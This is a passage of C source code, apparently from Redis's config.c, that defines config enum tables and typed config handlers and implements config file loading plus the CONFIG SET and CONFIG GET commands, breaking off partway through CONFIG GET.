* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
#include "server.h"
#include "cluster.h"
#include <fcntl.h>
#include <sys/stat.h>
/*-----------------------------------------------------------------------------
* Config file name-value maps.
*----------------------------------------------------------------------------*/
typedef struct configEnum {
const char *name;
const int val;
} configEnum;
configEnum maxmemory_policy_enum[] = {
{"volatile-lru", MAXMEMORY_VOLATILE_LRU},
{"volatile-lfu", MAXMEMORY_VOLATILE_LFU},
{"volatile-random",MAXMEMORY_VOLATILE_RANDOM},
{"volatile-ttl",MAXMEMORY_VOLATILE_TTL},
{"allkeys-lru",MAXMEMORY_ALLKEYS_LRU},
{"allkeys-lfu",MAXMEMORY_ALLKEYS_LFU},
{"allkeys-random",MAXMEMORY_ALLKEYS_RANDOM},
{"noeviction",MAXMEMORY_NO_EVICTION},
{NULL, 0}
};
configEnum syslog_facility_enum[] = {
{"user", LOG_USER},
{"local0", LOG_LOCAL0},
{"local1", LOG_LOCAL1},
{"local2", LOG_LOCAL2},
{"local3", LOG_LOCAL3},
{"local4", LOG_LOCAL4},
{"local5", LOG_LOCAL5},
{"local6", LOG_LOCAL6},
{"local7", LOG_LOCAL7},
{NULL, 0}
};
configEnum loglevel_enum[] = {
{"debug", LL_DEBUG},
{"verbose", LL_VERBOSE},
{"notice", LL_NOTICE},
{"warning", LL_WARNING},
{NULL,0}
};
configEnum supervised_mode_enum[] = {
{"upstart", SUPERVISED_UPSTART},
{"systemd", SUPERVISED_SYSTEMD},
{"auto", SUPERVISED_AUTODETECT},
{"no", SUPERVISED_NONE},
{NULL, 0}
};
configEnum aof_fsync_enum[] = {
{"everysec", AOF_FSYNC_EVERYSEC},
{"always", AOF_FSYNC_ALWAYS},
{"no", AOF_FSYNC_NO},
{NULL, 0}
};
configEnum repl_diskless_load_enum[] = {
{"disabled", REPL_DISKLESS_LOAD_DISABLED},
{"on-empty-db", REPL_DISKLESS_LOAD_WHEN_DB_EMPTY},
{"swapdb", REPL_DISKLESS_LOAD_SWAPDB},
{NULL, 0}
};
configEnum tls_auth_clients_enum[] = {
{"no", TLS_CLIENT_AUTH_NO},
{"yes", TLS_CLIENT_AUTH_YES},
{"optional", TLS_CLIENT_AUTH_OPTIONAL},
{NULL, 0}
};
configEnum oom_score_adj_enum[] = {
{"no", OOM_SCORE_ADJ_NO},
{"yes", OOM_SCORE_RELATIVE},
{"relative", OOM_SCORE_RELATIVE},
{"absolute", OOM_SCORE_ADJ_ABSOLUTE},
{NULL, 0}
};
/* Output buffer limits presets. */
clientBufferLimitsConfig clientBufferLimitsDefaults[CLIENT_TYPE_OBUF_COUNT] = {
{0, 0, 0}, /* normal */
{1024*1024*256, 1024*1024*64, 60}, /* slave */
{1024*1024*32, 1024*1024*8, 60} /* pubsub */
};
/* OOM Score defaults */
int configOOMScoreAdjValuesDefaults[CONFIG_OOM_COUNT] = { 0, 200, 800 };
/* Generic config infrastructure function pointers
* int is_valid_fn(val, err)
* Return 1 when val is valid, and 0 when invalid.
* Optionally set err to a static error string.
* int update_fn(val, prev, err)
* This function is called only for CONFIG SET command (not at config file parsing)
* It is called after the actual config is applied,
* Return 1 for success, and 0 for failure.
* Optionally set err to a static error string.
* On failure the config change will be reverted.
*/
/* Configuration values that require no special handling to set, get, load or
* rewrite. */
typedef struct boolConfigData {
int *config; /* The pointer to the server config this value is stored in */
const int default_value; /* The default value of the config on rewrite */
int (*is_valid_fn)(int val, char **err); /* Optional function to check validity of new value (generic doc above) */
int (*update_fn)(int val, int prev, char **err); /* Optional function to apply new value at runtime (generic doc above) */
} boolConfigData;
typedef struct stringConfigData {
char **config; /* Pointer to the server config this value is stored in. */
const char *default_value; /* Default value of the config on rewrite. */
int (*is_valid_fn)(char* val, char **err); /* Optional function to check validity of new value (generic doc above) */
int (*update_fn)(char* val, char* prev, char **err); /* Optional function to apply new value at runtime (generic doc above) */
int convert_empty_to_null; /* Boolean indicating if empty strings should
be stored as a NULL value. */
} stringConfigData;
typedef struct enumConfigData {
int *config; /* The pointer to the server config this value is stored in */
configEnum *enum_value; /* The underlying enum type this data represents */
const int default_value; /* The default value of the config on rewrite */
int (*is_valid_fn)(int val, char **err); /* Optional function to check validity of new value (generic doc above) */
int (*update_fn)(int val, int prev, char **err); /* Optional function to apply new value at runtime (generic doc above) */
} enumConfigData;
typedef enum numericType {
NUMERIC_TYPE_INT,
NUMERIC_TYPE_UINT,
NUMERIC_TYPE_LONG,
NUMERIC_TYPE_ULONG,
NUMERIC_TYPE_LONG_LONG,
NUMERIC_TYPE_ULONG_LONG,
NUMERIC_TYPE_SIZE_T,
NUMERIC_TYPE_SSIZE_T,
NUMERIC_TYPE_OFF_T,
NUMERIC_TYPE_TIME_T,
} numericType;
typedef struct numericConfigData {
union {
int *i;
unsigned int *ui;
long *l;
unsigned long *ul;
long long *ll;
unsigned long long *ull;
size_t *st;
ssize_t *sst;
off_t *ot;
time_t *tt;
} config; /* The pointer to the numeric config this value is stored in */
int is_memory; /* Indicates if this value can be loaded as a memory value */
numericType numeric_type; /* An enum indicating the type of this value */
long long lower_bound; /* The lower bound of this numeric value */
long long upper_bound; /* The upper bound of this numeric value */
const long long default_value; /* The default value of the config on rewrite */
int (*is_valid_fn)(long long val, char **err); /* Optional function to check validity of new value (generic doc above) */
int (*update_fn)(long long val, long long prev, char **err); /* Optional function to apply new value at runtime (generic doc above) */
} numericConfigData;
typedef union typeData {
boolConfigData yesno;
stringConfigData string;
enumConfigData enumd;
numericConfigData numeric;
} typeData;
typedef struct typeInterface {
/* Called on server start, to init the server with default value */
void (*init)(typeData data);
/* Called on server start, should return 1 on success, 0 on error and should set err */
int (*load)(typeData data, sds *argv, int argc, char **err);
/* Called on server startup and CONFIG SET, returns 1 on success, 0 on error
* and can set a verbose err string, update is true when called from CONFIG SET */
int (*set)(typeData data, sds value, int update, char **err);
/* Called on CONFIG GET, required to add output to the client */
void (*get)(client *c, typeData data);
/* Called on CONFIG REWRITE, required to rewrite the config state */
void (*rewrite)(typeData data, const char *name, struct rewriteConfigState *state);
} typeInterface;
typedef struct standardConfig {
const char *name; /* The user visible name of this config */
const char *alias; /* An alias that can also be used for this config */
const int modifiable; /* Can this value be updated by CONFIG SET? */
typeInterface interface; /* The function pointers that define the type interface */
typeData data; /* The type specific data exposed used by the interface */
} standardConfig;
standardConfig configs[];
/*-----------------------------------------------------------------------------
* Enum access functions
*----------------------------------------------------------------------------*/
/* Get enum value from name. If there is no match INT_MIN is returned. */
int configEnumGetValue(configEnum *ce, char *name) {
while(ce->name != NULL) {
if (!strcasecmp(ce->name,name)) return ce->val;
ce++;
}
return INT_MIN;
}
/* Get enum name from value. If no match is found NULL is returned. */
const char *configEnumGetName(configEnum *ce, int val) {
while(ce->name != NULL) {
if (ce->val == val) return ce->name;
ce++;
}
return NULL;
}
/* Wrapper for configEnumGetName() returning "unknown" instead of NULL if
* there is no match. */
const char *configEnumGetNameOrUnknown(configEnum *ce, int val) {
const char *name = configEnumGetName(ce,val);
return name ? name : "unknown";
}
/* Used for INFO generation. */
const char *evictPolicyToString(void) {
return configEnumGetNameOrUnknown(maxmemory_policy_enum,server.maxmemory_policy);
}
/*-----------------------------------------------------------------------------
* Config file parsing
*----------------------------------------------------------------------------*/
int yesnotoi(char *s) {
if (!strcasecmp(s,"yes")) return 1;
else if (!strcasecmp(s,"no")) return 0;
else return -1;
}
void appendServerSaveParams(time_t seconds, int changes) {
server.saveparams = zrealloc(server.saveparams,sizeof(struct saveparam)*(server.saveparamslen+1));
server.saveparams[server.saveparamslen].seconds = seconds;
server.saveparams[server.saveparamslen].changes = changes;
server.saveparamslen++;
}
void resetServerSaveParams(void) {
zfree(server.saveparams);
server.saveparams = NULL;
server.saveparamslen = 0;
}
void queueLoadModule(sds path, sds *argv, int argc) {
int i;
struct moduleLoadQueueEntry *loadmod;
loadmod = zmalloc(sizeof(struct moduleLoadQueueEntry));
loadmod->argv = zmalloc(sizeof(robj*)*argc);
loadmod->path = sdsnew(path);
loadmod->argc = argc;
for (i = 0; i < argc; i++) {
loadmod->argv[i] = createRawStringObject(argv[i],sdslen(argv[i]));
}
listAddNodeTail(server.loadmodule_queue,loadmod);
}
/* Parse an array of CONFIG_OOM_COUNT sds strings, validate and populate
* server.oom_score_adj_values if valid.
*/
static int updateOOMScoreAdjValues(sds *args, char **err, int apply) {
int i;
int values[CONFIG_OOM_COUNT];
for (i = 0; i < CONFIG_OOM_COUNT; i++) {
char *eptr;
long long val = strtoll(args[i], &eptr, 10);
if (*eptr != '\0' || val < -2000 || val > 2000) {
if (err) *err = "Invalid oom-score-adj-values, elements must be between -2000 and 2000.";
return C_ERR;
}
values[i] = val;
}
/* Verify that the values make sense. If they don't, emit a warning but
* keep the configuration, which may still be valid for privileged processes.
*/
if (values[CONFIG_OOM_REPLICA] < values[CONFIG_OOM_MASTER] ||
values[CONFIG_OOM_BGCHILD] < values[CONFIG_OOM_REPLICA]) {
serverLog(LL_WARNING,
"The oom-score-adj-values configuration may not work for non-privileged processes! "
"Please consult the documentation.");
}
/* Store values, retain previous config for rollback in case we fail. */
int old_values[CONFIG_OOM_COUNT];
for (i = 0; i < CONFIG_OOM_COUNT; i++) {
old_values[i] = server.oom_score_adj_values[i];
server.oom_score_adj_values[i] = values[i];
}
/* When parsing the config file, we want to apply only when all is done. */
if (!apply)
return C_OK;
/* Update */
if (setOOMScoreAdj(-1) == C_ERR) {
/* Roll back */
for (i = 0; i < CONFIG_OOM_COUNT; i++)
server.oom_score_adj_values[i] = old_values[i];
if (err)
*err = "Failed to apply oom-score-adj-values configuration, check server logs.";
return C_ERR;
}
return C_OK;
}
void initConfigValues() {
for (standardConfig *config = configs; config->name != NULL; config++) {
config->interface.init(config->data);
}
}
void loadServerConfigFromString(char *config) {
char *err = NULL;
int linenum = 0, totlines, i;
int slaveof_linenum = 0;
sds *lines;
lines = sdssplitlen(config,strlen(config),"\n",1,&totlines);
for (i = 0; i < totlines; i++) {
sds *argv;
int argc;
linenum = i+1;
lines[i] = sdstrim(lines[i]," \t\r\n");
/* Skip comments and blank lines */
if (lines[i][0] == '#' || lines[i][0] == '\0') continue;
/* Split into arguments */
argv = sdssplitargs(lines[i],&argc);
if (argv == NULL) {
err = "Unbalanced quotes in configuration line";
goto loaderr;
}
/* Skip this line if the resulting command vector is empty. */
if (argc == 0) {
sdsfreesplitres(argv,argc);
continue;
}
sdstolower(argv[0]);
/* Iterate the configs that are standard */
int match = 0;
for (standardConfig *config = configs; config->name != NULL; config++) {
if ((!strcasecmp(argv[0],config->name) ||
(config->alias && !strcasecmp(argv[0],config->alias))))
{
if (argc != 2) {
err = "wrong number of arguments";
goto loaderr;
}
if (!config->interface.set(config->data, argv[1], 0, &err)) {
goto loaderr;
}
match = 1;
break;
}
}
if (match) {
sdsfreesplitres(argv,argc);
continue;
}
/* Execute config directives */
if (!strcasecmp(argv[0],"bind") && argc >= 2) {
int j, addresses = argc-1;
if (addresses > CONFIG_BINDADDR_MAX) {
err = "Too many bind addresses specified"; goto loaderr;
}
/* Free old bind addresses */
for (j = 0; j < server.bindaddr_count; j++) {
zfree(server.bindaddr[j]);
}
for (j = 0; j < addresses; j++)
server.bindaddr[j] = zstrdup(argv[j+1]);
server.bindaddr_count = addresses;
} else if (!strcasecmp(argv[0],"unixsocketperm") && argc == 2) {
errno = 0;
server.unixsocketperm = (mode_t)strtol(argv[1], NULL, 8);
if (errno || server.unixsocketperm > 0777) {
err = "Invalid socket file permissions"; goto loaderr;
}
} else if (!strcasecmp(argv[0],"save")) {
if (argc == 3) {
int seconds = atoi(argv[1]);
int changes = atoi(argv[2]);
if (seconds < 1 || changes < 0) {
err = "Invalid save parameters"; goto loaderr;
}
appendServerSaveParams(seconds,changes);
} else if (argc == 2 && !strcasecmp(argv[1],"")) {
resetServerSaveParams();
}
} else if (!strcasecmp(argv[0],"dir") && argc == 2) {
if (chdir(argv[1]) == -1) {
serverLog(LL_WARNING,"Can't chdir to '%s': %s",
argv[1], strerror(errno));
exit(1);
}
} else if (!strcasecmp(argv[0],"logfile") && argc == 2) {
FILE *logfp;
zfree(server.logfile);
server.logfile = zstrdup(argv[1]);
if (server.logfile[0] != '\0') {
/* Test if we are able to open the file. The server will not
* be able to abort just for this problem later... */
logfp = fopen(server.logfile,"a");
if (logfp == NULL) {
err = sdscatprintf(sdsempty(),
"Can't open the log file: %s", strerror(errno));
goto loaderr;
}
fclose(logfp);
}
} else if (!strcasecmp(argv[0],"include") && argc == 2) {
loadServerConfig(argv[1],NULL);
} else if ((!strcasecmp(argv[0],"client-query-buffer-limit")) && argc == 2) {
server.client_max_querybuf_len = memtoll(argv[1],NULL);
} else if ((!strcasecmp(argv[0],"slaveof") ||
!strcasecmp(argv[0],"replicaof")) && argc == 3) {
slaveof_linenum = linenum;
sdsfree(server.masterhost);
if (!strcasecmp(argv[1], "no") && !strcasecmp(argv[2], "one")) {
server.masterhost = NULL;
continue;
}
server.masterhost = sdsnew(argv[1]);
char *ptr;
server.masterport = strtol(argv[2], &ptr, 10);
if (server.masterport < 0 || server.masterport > 65535 || *ptr != '\0') {
err = "Invalid master port"; goto loaderr;
}
server.repl_state = REPL_STATE_CONNECT;
} else if (!strcasecmp(argv[0],"requirepass") && argc == 2) {
if (strlen(argv[1]) > CONFIG_AUTHPASS_MAX_LEN) {
err = "Password is longer than CONFIG_AUTHPASS_MAX_LEN";
goto loaderr;
}
/* The old "requirepass" directive just translates to setting
* a password to the default user. The only thing we do
* additionally is to remember the cleartext password in this
* case, for backward compatibility with Redis <= 5. */
ACLSetUser(DefaultUser,"resetpass",-1);
sdsfree(server.requirepass);
server.requirepass = NULL;
if (sdslen(argv[1])) {
sds aclop = sdscatprintf(sdsempty(),">%s",argv[1]);
ACLSetUser(DefaultUser,aclop,sdslen(aclop));
sdsfree(aclop);
server.requirepass = sdsnew(argv[1]);
} else {
ACLSetUser(DefaultUser,"nopass",-1);
}
} else if (!strcasecmp(argv[0],"list-max-ziplist-entries") && argc == 2){
/* DEAD OPTION */
} else if (!strcasecmp(argv[0],"list-max-ziplist-value") && argc == 2) {
/* DEAD OPTION */
} else if (!strcasecmp(argv[0],"rename-command") && argc == 3) {
struct redisCommand *cmd = lookupCommand(argv[1]);
int retval;
if (!cmd) {
err = "No such command in rename-command";
goto loaderr;
}
/* If the target command name is the empty string we just
* remove it from the command table. */
retval = dictDelete(server.commands, argv[1]);
serverAssert(retval == DICT_OK);
/* Otherwise we re-add the command under a different name. */
if (sdslen(argv[2]) != 0) {
sds copy = sdsdup(argv[2]);
retval = dictAdd(server.commands, copy, cmd);
if (retval != DICT_OK) {
sdsfree(copy);
err = "Target command name already exists"; goto loaderr;
}
}
} else if (!strcasecmp(argv[0],"cluster-config-file") && argc == 2) {
zfree(server.cluster_configfile);
server.cluster_configfile = zstrdup(argv[1]);
} else if (!strcasecmp(argv[0],"client-output-buffer-limit") &&
argc == 5)
{
int class = getClientTypeByName(argv[1]);
unsigned long long hard, soft;
int soft_seconds;
if (class == -1 || class == CLIENT_TYPE_MASTER) {
err = "Unrecognized client limit class: the user specified "
"an invalid one, or 'master' which has no buffer limits.";
goto loaderr;
}
hard = memtoll(argv[2],NULL);
soft = memtoll(argv[3],NULL);
soft_seconds = atoi(argv[4]);
if (soft_seconds < 0) {
err = "Negative number of seconds in soft limit is invalid";
goto loaderr;
}
server.client_obuf_limits[class].hard_limit_bytes = hard;
server.client_obuf_limits[class].soft_limit_bytes = soft;
server.client_obuf_limits[class].soft_limit_seconds = soft_seconds;
} else if (!strcasecmp(argv[0],"oom-score-adj-values") && argc == 1 + CONFIG_OOM_COUNT) {
if (updateOOMScoreAdjValues(&argv[1], &err, 0) == C_ERR) goto loaderr;
} else if (!strcasecmp(argv[0],"notify-keyspace-events") && argc == 2) {
int flags = keyspaceEventsStringToFlags(argv[1]);
if (flags == -1) {
err = "Invalid event class character. Use 'g$lshzxeA'.";
goto loaderr;
}
server.notify_keyspace_events = flags;
} else if (!strcasecmp(argv[0],"user") && argc >= 2) {
int argc_err;
if (ACLAppendUserForLoading(argv,argc,&argc_err) == C_ERR) {
                /* Note: the error message buffer must be static because "err"
                 * is still dereferenced after the goto to loaderr, i.e. past
                 * the end of this block's lifetime. */
                static char buf[1024];
char *errmsg = ACLSetUserStringError();
snprintf(buf,sizeof(buf),"Error in user declaration '%s': %s",
argv[argc_err],errmsg);
err = buf;
goto loaderr;
}
} else if (!strcasecmp(argv[0],"loadmodule") && argc >= 2) {
queueLoadModule(argv[1],&argv[2],argc-2);
} else if (!strcasecmp(argv[0],"sentinel")) {
/* argc == 1 is handled by main() as we need to enter the sentinel
* mode ASAP. */
if (argc != 1) {
if (!server.sentinel_mode) {
err = "sentinel directive while not in sentinel mode";
goto loaderr;
}
err = sentinelHandleConfiguration(argv+1,argc-1);
if (err) goto loaderr;
}
} else {
err = "Bad directive or wrong number of arguments"; goto loaderr;
}
sdsfreesplitres(argv,argc);
}
/* Sanity checks. */
if (server.cluster_enabled && server.masterhost) {
linenum = slaveof_linenum;
i = linenum-1;
err = "replicaof directive not allowed in cluster mode";
goto loaderr;
}
sdsfreesplitres(lines,totlines);
return;
loaderr:
fprintf(stderr, "\n*** FATAL CONFIG FILE ERROR (Redis %s) ***\n",
REDIS_VERSION);
fprintf(stderr, "Reading the configuration file, at line %d\n", linenum);
fprintf(stderr, ">>> '%s'\n", lines[i]);
fprintf(stderr, "%s\n", err);
exit(1);
}
/* Load the server configuration from the specified filename.
* The function appends the additional configuration directives stored
* in the 'options' string to the config file before loading.
*
 * Both filename and options can be NULL; in that case they are considered
* empty. This way loadServerConfig can be used to just load a file or
* just load a string. */
void loadServerConfig(char *filename, char *options) {
sds config = sdsempty();
char buf[CONFIG_MAX_LINE+1];
/* Load the file content */
if (filename) {
FILE *fp;
if (filename[0] == '-' && filename[1] == '\0') {
fp = stdin;
} else {
if ((fp = fopen(filename,"r")) == NULL) {
serverLog(LL_WARNING,
"Fatal error, can't open config file '%s': %s",
filename, strerror(errno));
exit(1);
}
}
while(fgets(buf,CONFIG_MAX_LINE+1,fp) != NULL)
config = sdscat(config,buf);
if (fp != stdin) fclose(fp);
}
/* Append the additional options */
if (options) {
config = sdscat(config,"\n");
config = sdscat(config,options);
}
loadServerConfigFromString(config);
sdsfree(config);
}
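/* Illustrative usage (hypothetical path and directives, not taken from this
 * file):
 *
 *   loadServerConfig("/etc/redis/redis.conf", "port 6380\nmaxmemory 100mb");
 *
 * The extra "options" string is appended after the file content, so the
 * directives behave as if they were written at the end of the config file. */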
/*-----------------------------------------------------------------------------
* CONFIG SET implementation
*----------------------------------------------------------------------------*/
#define config_set_bool_field(_name,_var) \
} else if (!strcasecmp(c->argv[2]->ptr,_name)) { \
int yn = yesnotoi(o->ptr); \
if (yn == -1) goto badfmt; \
_var = yn;
#define config_set_numerical_field(_name,_var,min,max) \
} else if (!strcasecmp(c->argv[2]->ptr,_name)) { \
if (getLongLongFromObject(o,&ll) == C_ERR) goto badfmt; \
if (min != LLONG_MIN && ll < min) goto badfmt; \
if (max != LLONG_MAX && ll > max) goto badfmt; \
_var = ll;
#define config_set_memory_field(_name,_var) \
} else if (!strcasecmp(c->argv[2]->ptr,_name)) { \
ll = memtoll(o->ptr,&err); \
if (err || ll < 0) goto badfmt; \
_var = ll;
#define config_set_special_field(_name) \
} else if (!strcasecmp(c->argv[2]->ptr,_name)) {
#define config_set_special_field_with_alias(_name1,_name2) \
} else if (!strcasecmp(c->argv[2]->ptr,_name1) || \
!strcasecmp(c->argv[2]->ptr,_name2)) {
#define config_set_else } else
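/* Sketch of how the macros above are meant to expand (illustrative only):
 *
 *   if (0) {
 *   } else if (!strcasecmp(c->argv[2]->ptr,"client-query-buffer-limit")) {
 *       ll = memtoll(o->ptr,&err);
 *       if (err || ll < 0) goto badfmt;
 *       server.client_max_querybuf_len = ll;
 *   } else { ... }
 *
 * i.e. each config_set_* use below contributes one "else if" branch to the
 * chain started by the "if (0)" statement in configSetCommand(). */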
void configSetCommand(client *c) {
robj *o;
long long ll;
int err;
char *errstr = NULL;
serverAssertWithInfo(c,c->argv[2],sdsEncodedObject(c->argv[2]));
serverAssertWithInfo(c,c->argv[3],sdsEncodedObject(c->argv[3]));
o = c->argv[3];
/* Iterate the configs that are standard */
for (standardConfig *config = configs; config->name != NULL; config++) {
if(config->modifiable && (!strcasecmp(c->argv[2]->ptr,config->name) ||
(config->alias && !strcasecmp(c->argv[2]->ptr,config->alias))))
{
if (!config->interface.set(config->data,o->ptr,1,&errstr)) {
goto badfmt;
}
addReply(c,shared.ok);
return;
}
}
if (0) { /* this starts the config_set macros else-if chain. */
/* Special fields that can't be handled with general macros. */
config_set_special_field("requirepass") {
if (sdslen(o->ptr) > CONFIG_AUTHPASS_MAX_LEN) goto badfmt;
/* The old "requirepass" directive just translates to setting
* a password to the default user. The only thing we do
* additionally is to remember the cleartext password in this
* case, for backward compatibility with Redis <= 5. */
ACLSetUser(DefaultUser,"resetpass",-1);
sdsfree(server.requirepass);
server.requirepass = NULL;
if (sdslen(o->ptr)) {
sds aclop = sdscatprintf(sdsempty(),">%s",(char*)o->ptr);
ACLSetUser(DefaultUser,aclop,sdslen(aclop));
sdsfree(aclop);
server.requirepass = sdsnew(o->ptr);
} else {
ACLSetUser(DefaultUser,"nopass",-1);
}
} config_set_special_field("save") {
int vlen, j;
sds *v = sdssplitlen(o->ptr,sdslen(o->ptr)," ",1,&vlen);
/* Perform sanity check before setting the new config:
* - Even number of args
* - Seconds >= 1, changes >= 0 */
if (vlen & 1) {
sdsfreesplitres(v,vlen);
goto badfmt;
}
for (j = 0; j < vlen; j++) {
char *eptr;
long val;
val = strtoll(v[j], &eptr, 10);
if (eptr[0] != '\0' ||
((j & 1) == 0 && val < 1) ||
((j & 1) == 1 && val < 0)) {
sdsfreesplitres(v,vlen);
goto badfmt;
}
}
/* Finally set the new config */
resetServerSaveParams();
for (j = 0; j < vlen; j += 2) {
time_t seconds;
int changes;
seconds = strtoll(v[j],NULL,10);
changes = strtoll(v[j+1],NULL,10);
appendServerSaveParams(seconds, changes);
}
sdsfreesplitres(v,vlen);
} config_set_special_field("dir") {
if (chdir((char*)o->ptr) == -1) {
addReplyErrorFormat(c,"Changing directory: %s", strerror(errno));
return;
}
} config_set_special_field("client-output-buffer-limit") {
int vlen, j;
sds *v = sdssplitlen(o->ptr,sdslen(o->ptr)," ",1,&vlen);
/* We need a multiple of 4: <class> <hard> <soft> <soft_seconds> */
if (vlen % 4) {
sdsfreesplitres(v,vlen);
goto badfmt;
}
            /* Sanity check every argument first, so that we either refuse the
             * whole configuration string or accept it all: a single error in a
             * single client class rejects the whole setting. */
for (j = 0; j < vlen; j++) {
long val;
if ((j % 4) == 0) {
int class = getClientTypeByName(v[j]);
if (class == -1 || class == CLIENT_TYPE_MASTER) {
sdsfreesplitres(v,vlen);
goto badfmt;
}
} else {
val = memtoll(v[j], &err);
if (err || val < 0) {
sdsfreesplitres(v,vlen);
goto badfmt;
}
}
}
/* Finally set the new config */
for (j = 0; j < vlen; j += 4) {
int class;
unsigned long long hard, soft;
int soft_seconds;
class = getClientTypeByName(v[j]);
hard = memtoll(v[j+1],NULL);
soft = memtoll(v[j+2],NULL);
soft_seconds = strtoll(v[j+3],NULL,10);
server.client_obuf_limits[class].hard_limit_bytes = hard;
server.client_obuf_limits[class].soft_limit_bytes = soft;
server.client_obuf_limits[class].soft_limit_seconds = soft_seconds;
}
sdsfreesplitres(v,vlen);
} config_set_special_field("oom-score-adj-values") {
int vlen;
int success = 1;
sds *v = sdssplitlen(o->ptr, sdslen(o->ptr), " ", 1, &vlen);
if (vlen != CONFIG_OOM_COUNT || updateOOMScoreAdjValues(v, &errstr, 1) == C_ERR)
success = 0;
sdsfreesplitres(v, vlen);
if (!success)
goto badfmt;
} config_set_special_field("notify-keyspace-events") {
int flags = keyspaceEventsStringToFlags(o->ptr);
if (flags == -1) goto badfmt;
server.notify_keyspace_events = flags;
/* Numerical fields.
* config_set_numerical_field(name,var,min,max) */
} config_set_numerical_field(
"watchdog-period",ll,0,INT_MAX) {
if (ll)
enableWatchdog(ll);
else
disableWatchdog();
/* Memory fields.
* config_set_memory_field(name,var) */
} config_set_memory_field(
"client-query-buffer-limit",server.client_max_querybuf_len) {
/* Everything else is an error... */
} config_set_else {
addReplyErrorFormat(c,"Unsupported CONFIG parameter: %s",
(char*)c->argv[2]->ptr);
return;
}
/* On success we just return a generic OK for all the options. */
addReply(c,shared.ok);
return;
badfmt: /* Bad format errors */
if (errstr) {
addReplyErrorFormat(c,"Invalid argument '%s' for CONFIG SET '%s' - %s",
(char*)o->ptr,
(char*)c->argv[2]->ptr,
errstr);
} else {
addReplyErrorFormat(c,"Invalid argument '%s' for CONFIG SET '%s'",
(char*)o->ptr,
(char*)c->argv[2]->ptr);
}
}
/*-----------------------------------------------------------------------------
* CONFIG GET implementation
*----------------------------------------------------------------------------*/
#define config_get_string_field(_name,_var) do { \
if (stringmatch(pattern,_name,1)) { \
addReplyBulkCString(c,_name); \
addReplyBulkCString(c,_var ? _var : ""); \
matches++; \
} \
} while(0);
#define config_get_bool_field(_name,_var) do { \
if (stringmatch(pattern,_name,1)) { \
addReplyBulkCString(c,_name); \
addReplyBulkCString(c,_var ? "yes" : "no"); \
matches++; \
} \
} while(0);
#define config_get_numerical_field(_name,_var) do { \
if (stringmatch(pattern,_name,1)) { \
ll2string(buf,sizeof(buf),_var); \
addReplyBulkCString(c,_name); \
addReplyBulkCString(c,buf); \
matches++; \
} \
} while(0);
void configGetCommand(client *c) {
robj *o = c->argv[2];
void *replylen = addReplyDeferredLen(c);
char *pattern = o->ptr;
char buf[128];
int matches = 0;
serverAssertWithInfo(c,o,sdsEncodedObject(o));
/* Iterate the configs that are standard */
for (standardConfig *config = configs; config->name != NULL; config++) {
if (stringmatch(pattern,config->name,1)) {
addReplyBulkCString(c,config->name);
config->interface.get(c,config->data);
matches++;
}
if (config->alias && stringmatch(pattern,config->alias,1)) {
addReplyBulkCString(c,config->alias);
config->interface.get(c,config->data);
matches++;
}
}
/* String values */
config_get_string_field("logfile",server.logfile);
/* Numerical values */
config_get_numerical_field("client-query-buffer-limit",server.client_max_querybuf_len);
config_get_numerical_field("watchdog-period",server.watchdog_period);
/* Everything we can't handle with macros follows. */
if (stringmatch(pattern,"dir",1)) {
char buf[1024];
if (getcwd(buf,sizeof(buf)) == NULL)
buf[0] = '\0';
addReplyBulkCString(c,"dir");
addReplyBulkCString(c,buf);
matches++;
}
if (stringmatch(pattern,"save",1)) {
sds buf = sdsempty();
int j;
for (j = 0; j < server.saveparamslen; j++) {
buf = sdscatprintf(buf,"%jd %d",
(intmax_t)server.saveparams[j].seconds,
server.saveparams[j].changes);
if (j != server.saveparamslen-1)
buf = sdscatlen(buf," ",1);
}
addReplyBulkCString(c,"save");
addReplyBulkCString(c,buf);
sdsfree(buf);
matches++;
}
if (stringmatch(pattern,"client-output-buffer-limit",1)) {
sds buf = sdsempty();
int j;
for (j = 0; j < CLIENT_TYPE_OBUF_COUNT; j++) {
buf = sdscatprintf(buf,"%s %llu %llu %ld",
getClientTypeName(j),
server.client_obuf_limits[j].hard_limit_bytes,
server.client_obuf_limits[j].soft_limit_bytes,
(long) server.client_obuf_limits[j].soft_limit_seconds);
if (j != CLIENT_TYPE_OBUF_COUNT-1)
buf = sdscatlen(buf," ",1);
}
addReplyBulkCString(c,"client-output-buffer-limit");
addReplyBulkCString(c,buf);
sdsfree(buf);
matches++;
}
if (stringmatch(pattern,"unixsocketperm",1)) {
char buf[32];
snprintf(buf,sizeof(buf),"%o",server.unixsocketperm);
addReplyBulkCString(c,"unixsocketperm");
addReplyBulkCString(c,buf);
matches++;
}
if (stringmatch(pattern,"slaveof",1) ||
stringmatch(pattern,"replicaof",1))
{
char *optname = stringmatch(pattern,"slaveof",1) ?
"slaveof" : "replicaof";
char buf[256];
addReplyBulkCString(c,optname);
if (server.masterhost)
snprintf(buf,sizeof(buf),"%s %d",
server.masterhost, server.masterport);
else
buf[0] = '\0';
addReplyBulkCString(c,buf);
matches++;
}
if (stringmatch(pattern,"notify-keyspace-events",1)) {
sds flags = keyspaceEventsFlagsToString(server.notify_keyspace_events);
addReplyBulkCString(c,"notify-keyspace-events");
addReplyBulkSds(c,flags);
matches++;
}
if (stringmatch(pattern,"bind",1)) {
sds aux = sdsjoin(server.bindaddr,server.bindaddr_count," ");
addReplyBulkCString(c,"bind");
addReplyBulkCString(c,aux);
sdsfree(aux);
matches++;
}
if (stringmatch(pattern,"requirepass",1)) {
addReplyBulkCString(c,"requirepass");
sds password = server.requirepass;
if (password) {
addReplyBulkCBuffer(c,password,sdslen(password));
} else {
addReplyBulkCString(c,"");
}
matches++;
}
if (stringmatch(pattern,"oom-score-adj-values",0)) {
sds buf = sdsempty();
int j;
for (j = 0; j < CONFIG_OOM_COUNT; j++) {
